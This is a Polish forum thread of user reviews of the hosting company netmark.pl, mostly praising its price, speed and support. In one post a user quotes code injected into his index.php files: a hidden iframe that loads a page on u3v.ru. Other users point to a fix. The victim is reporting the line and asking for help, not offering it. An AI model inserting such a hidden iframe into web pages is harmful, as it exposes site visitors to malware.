phpBB2 by Przemo
Support forów phpBB2 modified by Przemo

FAQFAQ - PIERWSZA POMOC!!  regulaminREGULAMIN  SzukajSZUKAJ  UżytkownicyUżytkownicy  GrupyGrupy  StatystykiStatystyki
RejestracjaRejestracja  ZalogujZaloguj  DownloadDownload  katalog Forów DyskusyjnychKatalog Forów   FAQ Video tutoriale

Poprzedni temat «» Następny temat
[opinie] netmark.pl
Autor Wiadomość
Bogdan92


Posty: 22
Wysłany: 26-03-2008, 20:02   

Bardzo mi się spodobał ten hosting! Szukam właśnie czegoś taniego i w miarę przyzwoitego.
Pingi 26m/s - super! Cena hostingu i domen - super! Zastanawia mnie tylko dlaczego sprawdzając dostępność domeny pokazuje, że jest niedostępna, a np. na nazwa.pl pokazuje, że jest dostępna... :?
 
     
Gadatliwa Kasia 

   
sseven


Posty: 89
Wysłany: 18-06-2008, 20:43   

Co możecie teraz powiedzieć o tej firmie ?
Wczoraj na nich trafiłem, zamówiłem konto testowe i jak na razie rewelacja. Nie mam się do czego doczepić. W internecie znalazłem praktycznie same pozytywne opinie o nich.
 
     
maciejnet


Posty: 10
Wysłany: 18-06-2008, 20:52   

Spieszę z odpowiedzią :)
Posiadam tam stronę opartą na phpbb2 by przemo ( http://farmus.net ). Strona przyzwoicie się ładuje, oraz nie ma zastojów. Support czasami odpowiada w przeciągu 5 minut, lecz regułą jest kilka godzin. Są bardzo wyrozumiali i elastyczni w różnych sprawach (konfiguracja php, przenoszeni bazy, dodatkowy transfer).
Jestem zadowolony i nie mam zastrzeżeń. W przyszłości nie wiem, czy bym się zdecydował inną firmę hostingową. Po co przepłacać?
 
     
sseven


Posty: 89
Wysłany: 18-06-2008, 20:59   

maciejnet, myślisz, że pomogliby w przeniesieniu forum przemo na ich serwer ?
Myślę także nad transferem domeny z az.pl do nich.
 
     
maciejnet


Posty: 10
Wysłany: 18-06-2008, 21:15   

@sseven

Miałem drobne problemy z polskimi znakami w bazie danych i po kontakcie bez problemu zaoferowali pomoc. Jednak sam sobie poradziłem z problemem.
Nie robią problemów.
 
     
sseven


Posty: 89
Wysłany: 01-08-2008, 10:25   

Polecam ten hosting w 100%. Forum działa bez problemów. Obsługa wyśmienita, a do tego mają naprawdę tanio jak na taką jakość usług.
W porównaniu do livenet, to jak ... nawet nie ma co porównywać :P
 
     
sskoczek


Pomógł: 1 raz
Posty: 42
Wysłany: 07-01-2009, 22:10   

Moje forum (6 tys użytkowników) leży na netmarku już ponad rok. Polecam bardzo. Przez cały okres współpracy z nimi tylko raz zdarzyło się, że ich serwery miały siakąś awarie 1 czy 2 godziny
 
     
maciejnet


Posty: 10
Wysłany: 17-03-2009, 01:04   

Chciałbym pochwalić obsługę firmy, która dla lojalnych klientów przygotowuje znaczne obniżki cen serwerów. Nie dość, że serwery pierwsza klasa to jeszcze cena z roku na rok niższa (i to w dobie kryzysu).
 
     
smyku2

Pomógł: 2 razy
Posty: 116
Wysłany: 19-05-2009, 20:12   

Serwer mam wykupiony już czwarty miesiąc, forum działa szybko i stabilnie. Szczerze powiedziawszy nie znam lepszej firmy, a troszke już ich było.
Super osbługa, bogaty panel, szybki serwer. Na prawde służa pomoca i staraja sie pomoc w kazdej sytuacji.
Jedyny minus to dobór transferu, troszke dla mnie nie wygodny, tutaj za mało, a BIG już za dużo, ale ogólnie super sprawa.
 
     
Champion90

Posty: 17
Wysłany: 01-07-2009, 23:46   

Witam. Piszę do Was z pewnym zapytaniem. Otóż posiadam hosting w NetMark. Jednak już drugi raz (w przeciągu tygodnia) zdarzyło mi się, że serwer wyrzuca błędy związane z plikiem index.php (zarówno w skrypcie przema jak i extreme-fusion). Gdy jednak ponownie wgram index.php na serwer, wszystko działa dobrze...
 
     
smyku2

Pomógł: 2 razy
Posty: 116
Wysłany: 02-07-2009, 08:08   

A co to za błędy? zgłaszałeś się do BOKu?
 
     
sseven


Posty: 89
Wysłany: 02-07-2009, 08:10   

Najlepiej napisz do administracji, oni szybciej i konkretniej odpowiedzą
 
     
Champion90

Posty: 17
Wysłany: 06-07-2009, 18:01   

Otóż przy końcu plików index.php (zarówno w głównym katalogu jak i np. katalogu 'admin') przy końcu pliku co jakiś czas dopisuje się taki oto kod:

Kod:
<iframe src="http://u3v.ru:8080/index.php" width=107 height=140 style="visibility: hidden"></iframe>


który powoduje oto takie błędy: http://e-films.pl/forum/index.php

Ktoś już z Was miał podobny problem?
 
     
kevin_


Pomógł: 768 razy
Posty: 2680
Wysłany: 06-07-2009, 18:06   

Champion90, to chyba to;
http://www.przemo.org/php...p=435134#435134
_________________
Prezes :mrgreen:
 
     
Gadatliwa Kasia 

   
Jackob J

Pomógł: 1 raz
Posty: 59
Wysłany: 09-07-2009, 13:58   

Champion90> Miałem dzisiaj to samo. I również na netmarku. Nie wiem czy to na serwery netmarku dostał się wirus, czy wszedł on po prostu z naszych komputerów (każdemu osobno).

W każdym bądź razie jest to to o czym napisał kevin. Ja poradziłem sobie z problem w sposób jaki opisałem w ostatnim poście w tym temacie:
http://www.przemo.org/php...pic.php?t=80009

PS. Co tu netmarku. Siedzę tam 7 miesięcy i nie licząc tego zamieszania z wirusem (które zresztą prawdopodobnie jest z mojej winy), jestem jak najbardziej zadowolony.
 
     
Wyświetl posty z ostatnich:   
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Możesz ściągać załączniki na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Skocz do:  

Kopiowanie wszelkich treści zawartych na forum, modyfikacji oraz instrukcji bez zgody administracji i autorów tematów/postów zabronione!

Powered by phpBB modified by Przemo © 2003 phpBB
Strona wygenerowana w 0,08 sekundy. Zapytań do SQL: 11
Polecane serwisy

Najlepsze oprogramowanie do prowadzenia sklepu internetowegoNajlepszy program do sklepu firmowany przez Przem'a

Sklep z gadżetami

mediaclick.pl

serwis laptopów

phpbb

Polisy Ubezpieczeniowe TU Europa

Design Cart - Tworzenie sklepu internetowego

dnirozwoju.pl

Ranking Hostingów HostingOnline.pl

• Zamów reklamę